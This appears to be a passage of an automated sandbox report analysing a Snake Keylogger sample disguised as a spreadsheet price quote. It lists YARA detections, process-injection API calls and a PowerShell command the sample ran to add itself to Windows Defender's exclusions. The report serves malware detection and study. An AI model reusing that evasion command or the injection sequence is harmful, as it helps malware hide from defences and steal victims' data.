Commandline:	"C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Imagebase:	0x4d0000
File size:	539'136 bytes
MD5 hash:	ACDB58C5ABAD0535DE184D32C04C75A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:09:57
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Imagebase:	0xfc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:09:57
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Imagebase:	0x840000
File size:	539'136 bytes
MD5 hash:	ACDB58C5ABAD0535DE184D32C04C75A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4109948122.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	11:09:57
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	177
Total number of Limit Nodes:	10

Executed Functions

Function 07239350 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bfcf07c1c4e9b3ac37c3f8e713a915f6d28dfc5c973a79c1aa2c0585208cab
Instruction ID: 33cceb972e721e5b7d8757cc43f806041c6e2b7a9ada1ef4906f7355a8bfd6ac
Opcode Fuzzy Hash: 51bfcf07c1c4e9b3ac37c3f8e713a915f6d28dfc5c973a79c1aa2c0585208cab
Instruction Fuzzy Hash: B5C1BAF07112068FDB1ADB76C4907AE77FAAF8A604F14846DD186CB390CB75E841CB51

Function 072380DE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447971dd81c0fa770cffc9a377c3a45f040deefd5ef550adde59947726e2f796
Instruction ID: b9c74ad535242107f8e5e0d2b9389a8c54069f2197f9852ee78bce54beda7d98
Opcode Fuzzy Hash: 447971dd81c0fa770cffc9a377c3a45f040deefd5ef550adde59947726e2f796
Instruction Fuzzy Hash: B9D052F4C7E104CFCB40AE6084482F8BABCB70B200F183595A00EAB302C6B489818E38

Function 0103CFD0 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0103D05E
GetCurrentThread.KERNEL32 ref: 0103D09B
GetCurrentProcess.KERNEL32 ref: 0103D0D8
GetCurrentThreadId.KERNEL32 ref: 0103D131

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 38d5c3a336990a5810aaca451bdf809106572de02472b85c9cf1a5c4b9f83fae
Instruction ID: 4f114c457d21e5d1422042a71333e6c081b973b3c1e4806f396c62ba763860eb
Opcode Fuzzy Hash: 38d5c3a336990a5810aaca451bdf809106572de02472b85c9cf1a5c4b9f83fae
Instruction Fuzzy Hash: E95168B0901349CFDB58CFA9D548B9EBFF5AF88314F248499E509A7361DB346944CF21

Function 0103CFE0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0103D05E
GetCurrentThread.KERNEL32 ref: 0103D09B
GetCurrentProcess.KERNEL32 ref: 0103D0D8
GetCurrentThreadId.KERNEL32 ref: 0103D131

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ac72a5be4710193e7db91fb130931ef22bb863e63926a4bccbd1169efc774bf5
Instruction ID: a96182cf1ffa630ba28b06f45fdcf8497a0c076584c0662dd9da55e3b3510a14
Opcode Fuzzy Hash: ac72a5be4710193e7db91fb130931ef22bb863e63926a4bccbd1169efc774bf5
Instruction Fuzzy Hash: 8A5166B0900349CFDB54CFA9D648B9EBBF5EF88314F208499E509A7350DB34A984CF65

Function 07235D7C Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07235FBE

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cc9fffd0a6fdca6103397689de5a77c41cd8022e9f814e24491398c55afb84f5
Instruction ID: e6a5cff32d6aff356bb2db003c0a47aec4c7cc474d17cc8cad776f9e03a1bd4c
Opcode Fuzzy Hash: cc9fffd0a6fdca6103397689de5a77c41cd8022e9f814e24491398c55afb84f5
Instruction Fuzzy Hash: BBA18AB1D1025ADFDB20CF69C8417EDBBB6FF48310F1486AAE808A7240DB759985CF91

Function 07235D88 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07235FBE

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 470a3d83eb7ffa3c9f6c4e1f7cdf83d0e78d21dad1c5071bb50603d50daf0140
Instruction ID: 13ca1bfe59c8462ce2df85af4d6293bbb8b89e33393443339fa134c45ebf965a
Opcode Fuzzy Hash: 470a3d83eb7ffa3c9f6c4e1f7cdf83d0e78d21dad1c5071bb50603d50daf0140
Instruction Fuzzy Hash: BD918AB1D1025ADFDB20CF69C841BDDBBB6FF48310F1086A9E808A7240DB759985CF91

Function 0103AD48 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0103AF9E

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a7bd6108bf35e48d0b9187a6b395ce948fef79f9b3fac2e34e4b8ee77eeb882c
Instruction ID: 9f28a5d54a65cb9ffa972072b575350f432b46f66961950479ae4d1a5e91d051
Opcode Fuzzy Hash: a7bd6108bf35e48d0b9187a6b395ce948fef79f9b3fac2e34e4b8ee77eeb882c
Instruction Fuzzy Hash: 017144B0A00B05CFDB64DF69D04479ABBF9BF88304F008A6DD48AD7A50DB75E849CB90

Function 0103590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010359C9

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 278f5d5c6895ee69d4def6c70e0398a3d02de73ec5c382ce4ad60a7b4a795630
Instruction ID: 8d56d3bd7ea3952fccd8f389ff81c9f4d638ded76f3fdd95c65a2b5f6dd9df19
Opcode Fuzzy Hash: 278f5d5c6895ee69d4def6c70e0398a3d02de73ec5c382ce4ad60a7b4a795630
Instruction Fuzzy Hash: 3441B0B1C00719CADF24CFAAC984BCDBBF5BF88314F24805AD459AB261DB75694ACF50

Function 010344B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010359C9

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07fc6b7f7b45138e2d0193b5350f303b2c9c41644bc27ce6ca4447e808b721b1
Instruction ID: 42ef05763d36fde9bec2e15e3c31d579e038cc2fc17cec098af24893389fbc20
Opcode Fuzzy Hash: 07fc6b7f7b45138e2d0193b5350f303b2c9c41644bc27ce6ca4447e808b721b1
Instruction Fuzzy Hash: 2341D3B0C00719CADB24CFA9C984B8EBBF5FF45304F20805AD459AB261DB756945CF90

Function 07235AF9 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07235B90

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1ec6a9d9c7e40ae02293e8b2d29e46422b4c50edd471217e094f0b6f35470918
Instruction ID: 0acaf7fa6981899ff051ba6e7e0a58db6ab21d59e367c6d92d1070a6f6ca1521
Opcode Fuzzy Hash: 1ec6a9d9c7e40ae02293e8b2d29e46422b4c50edd471217e094f0b6f35470918
Instruction Fuzzy Hash: 5F214BB1D003599FCB10CFAAC881BDEBBF5FF48320F10842AE919A7240C7789554DBA5

Function 07235B00 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07235B90

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bb65dd3ffaca3ac0650f2a86102f08da85e6211663965008e09cf70dd8ec77c6
Instruction ID: 9a93ef0f58f623a4888f01682feb4025efdf96139e22d6723fdae313f6ae63ae
Opcode Fuzzy Hash: bb65dd3ffaca3ac0650f2a86102f08da85e6211663965008e09cf70dd8ec77c6
Instruction Fuzzy Hash: 092126B19003499FCB10CFAAC881BDEBBF5FF48320F10842AE919A7240C7799950DBA5

Function 07235960 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072359E6

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8654b488d64d5f5c2b3538d613fb4e1e121c116647171e09ba76051c3762c2d7
Instruction ID: b682f5c47ce17cc4d2f428bfa15b972dc0f0359982aca399667d56c73454ea2f
Opcode Fuzzy Hash: 8654b488d64d5f5c2b3538d613fb4e1e121c116647171e09ba76051c3762c2d7
Instruction Fuzzy Hash: 642159B1D0030A8FDB10CFAAC481BEEBBF4EF48324F14842AD459A7240C7789645CFA1

Function 07235BE8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07235C70

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9823ae6f0fc8ff820d47a4b9b47a28f24c31099c529335912adfb208adb5dfc9
Instruction ID: 38ffd2730b7d131df3b3901138060d832cd409f13c5fb93f1136c678ceb207b7
Opcode Fuzzy Hash: 9823ae6f0fc8ff820d47a4b9b47a28f24c31099c529335912adfb208adb5dfc9
Instruction Fuzzy Hash: 0B2148B5D002499FCB10CFAAC881AEEFBF5FF48320F10842AE519A7240C7799941DBA1

Function 07235BF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07235C70

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e9b16a7704c6ebb4f83a44090efc834678d45406913b0aaa31a092d51442de72
Instruction ID: 895895a8c0ab38fc30220892879efb2abfde6d295f90b755dbd4ef56a952b021
Opcode Fuzzy Hash: e9b16a7704c6ebb4f83a44090efc834678d45406913b0aaa31a092d51442de72
Instruction Fuzzy Hash: 142128B1C003499FCB10CFAAC881ADEFBF5FF48324F50842AE519A7240C7799540DBA1

Function 07235968 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072359E6

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 09c270761bb90c0c381154334cfc4c26e5fdc3128b083869db4ffaa72305ca16
Instruction ID: d72768a71899181dbe7f8a39575f9a70ed2d7d425a0487fcd96bd95aba848c96
Opcode Fuzzy Hash: 09c270761bb90c0c381154334cfc4c26e5fdc3128b083869db4ffaa72305ca16
Instruction Fuzzy Hash: 3F2138B1D003098FDB10DFAAC485BEEBBF4EF48324F54842AD459A7240CB789945CFA1

Function 0103D630 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103D6B7

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4d2d3c3dd986cb649dc6094726def81e6bafc6d52a71601720ae8e0cddeab37
Instruction ID: 216ca4f053e14075d2fced2e91ba224f945d3a620aa2c4b2d86efd61afd6324d
Opcode Fuzzy Hash: d4d2d3c3dd986cb649dc6094726def81e6bafc6d52a71601720ae8e0cddeab37
Instruction Fuzzy Hash: E221E4B5900248DFDB10CF9AD984ADEBFF8EB48320F14801AE958A3310C374A940DFA5

Function 0103D629 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0103D6B7

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 516b6d8e79f2d955c20f1747d8cbb83bacdccc5c45d1dd39788c3076608e6bd5
Instruction ID: c58d18edf7a1be0705f01069c95153ee2f7530825368eac8140601c353725a2b
Opcode Fuzzy Hash: 516b6d8e79f2d955c20f1747d8cbb83bacdccc5c45d1dd39788c3076608e6bd5
Instruction Fuzzy Hash: 9221E4B5D00209DFDB10CF9AD584ADEBBF5FB48324F14801AE958A3350C374A940DFA4

Function 07235A38 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07235AAE

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0324c9c19de31881f832af3b7dbd43bb7564222cc3bf15058827fb5404191c5f
Instruction ID: 7b8dddf3bbdae9b9d4873ad4a64edebaff305aa07d4a5cb0d877b76d5d78bc2c
Opcode Fuzzy Hash: 0324c9c19de31881f832af3b7dbd43bb7564222cc3bf15058827fb5404191c5f
Instruction Fuzzy Hash: 75115CB58002499FCB10CFAAC845AEFBFF9EF48324F14841AE519A7250C7759550DFA1

Function 07235A40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07235AAE

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b68ef8e1c8964be28b608e27e6d4935b7e00ffe2a2835d7f6ff16ec03190b3f5
Instruction ID: c0df7ddb3243ebed39679256d93489545ef31b20a262172cf3c4ca847a9e2e42
Opcode Fuzzy Hash: b68ef8e1c8964be28b608e27e6d4935b7e00ffe2a2835d7f6ff16ec03190b3f5
Instruction Fuzzy Hash: E61137B1900249DFCB10DFAAC845ADEBFF5EF88324F248419E519A7250C775A550DFA1

Function 07235040 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072350AA

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7180ad1bc729997813cee798b2375aca9cc333fc524faac91bf86edc49a651f1
Instruction ID: 029245463cd7e441d7474b674880aca4f18f95dc6b77279a3b92340bcbe76462
Opcode Fuzzy Hash: 7180ad1bc729997813cee798b2375aca9cc333fc524faac91bf86edc49a651f1
Instruction Fuzzy Hash: 521146B19003498BCB20DFAAC445BDEFBF9EB88324F24845AD519AB240D775A904CBA5

Function 07235048 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072350AA

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7602870a9cc67ec785c4d4693fc776f2881b2edc0b16882c21758821f2c8a740
Instruction ID: adcf88f612a36c4aefed68fd3bccf0dd5b11f1e9e0ac23dd9b0d728dec1f9838
Opcode Fuzzy Hash: 7602870a9cc67ec785c4d4693fc776f2881b2edc0b16882c21758821f2c8a740
Instruction Fuzzy Hash: 041128B19003498FDB20DFAAC44579EFBF9EB88324F248419D519A7240C675A544CB95

Function 07238F30 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07238F95

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 18db05fae3bb2338cbd9495cd0d4ae934a361ddd14c337313be517a9de0fcdc6
Instruction ID: bb5c043b492fbc9142e7d9560e6259bcb19a7d170799879d5c66533363026958
Opcode Fuzzy Hash: 18db05fae3bb2338cbd9495cd0d4ae934a361ddd14c337313be517a9de0fcdc6
Instruction Fuzzy Hash: 4A11F2B5800349DFCB10CF9AD885BDEBFF8EB58324F24845AE918A7600C375A554CFA1

Function 072370F8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07238F95

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c5aa45a87251b8a612a52d7878b44f7fbb524acf092522a1b47a53586a7b5423
Instruction ID: 948fb4d15e22279ec9883df9afd8df91837379a5ec6ae79d9e82a5db90154097
Opcode Fuzzy Hash: c5aa45a87251b8a612a52d7878b44f7fbb524acf092522a1b47a53586a7b5423
Instruction Fuzzy Hash: ED1106B5810349DFCB10DF99C945BDEFBF8EB58324F108459E515A7200C379A944CFA1

Function 0103AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0103AF9E

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b4818d4825dc6fa24635e140edc2c0c69230db5760fb3ed7e8ce90439fb58fd3
Instruction ID: e4ca9738b8b1661353185c138b2bc5ff2de1ac8b781b6986f771d3084fc61c94
Opcode Fuzzy Hash: b4818d4825dc6fa24635e140edc2c0c69230db5760fb3ed7e8ce90439fb58fd3
Instruction Fuzzy Hash: BF110FB5D00649CFDB10CF9AC444ADEFBF8EB88324F10845AD859A7240C379A545CFA1

Function 00C4D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 737d0de6679106ccd96bb6295f822c622c4f2858a15ec163ce62420507f94b63
Instruction ID: b077136428f5ac1095d4ba3b6cead854f714f32fb4a89b6b7163afb783ba5040
Opcode Fuzzy Hash: 737d0de6679106ccd96bb6295f822c622c4f2858a15ec163ce62420507f94b63
Instruction Fuzzy Hash: 0B2167B1604200DFCB05EF14D9C0F26BF65FB88328F20C56DE90A0B256C736D956DBA2

Function 00C4D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6735e99a1a81389d9004bba33931d882c042a79f3beae69ab299619153f0ee
Instruction ID: 7655f4eedd0d5fc4530f1c2009791ab3d7dfef97b2ed896934c499f8955d58d9
Opcode Fuzzy Hash: 8f6735e99a1a81389d9004bba33931d882c042a79f3beae69ab299619153f0ee
Instruction Fuzzy Hash: DD2137B5504204DFDB05EF14D9C0B26BF65FB98324F24C56DE90B0B256C33AE856DBA2

Function 00C5D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713116396.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c5d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28717a39e9795a1632c3e9d48e7d264ffe8db12761efd38758e52d8efe5e4ca
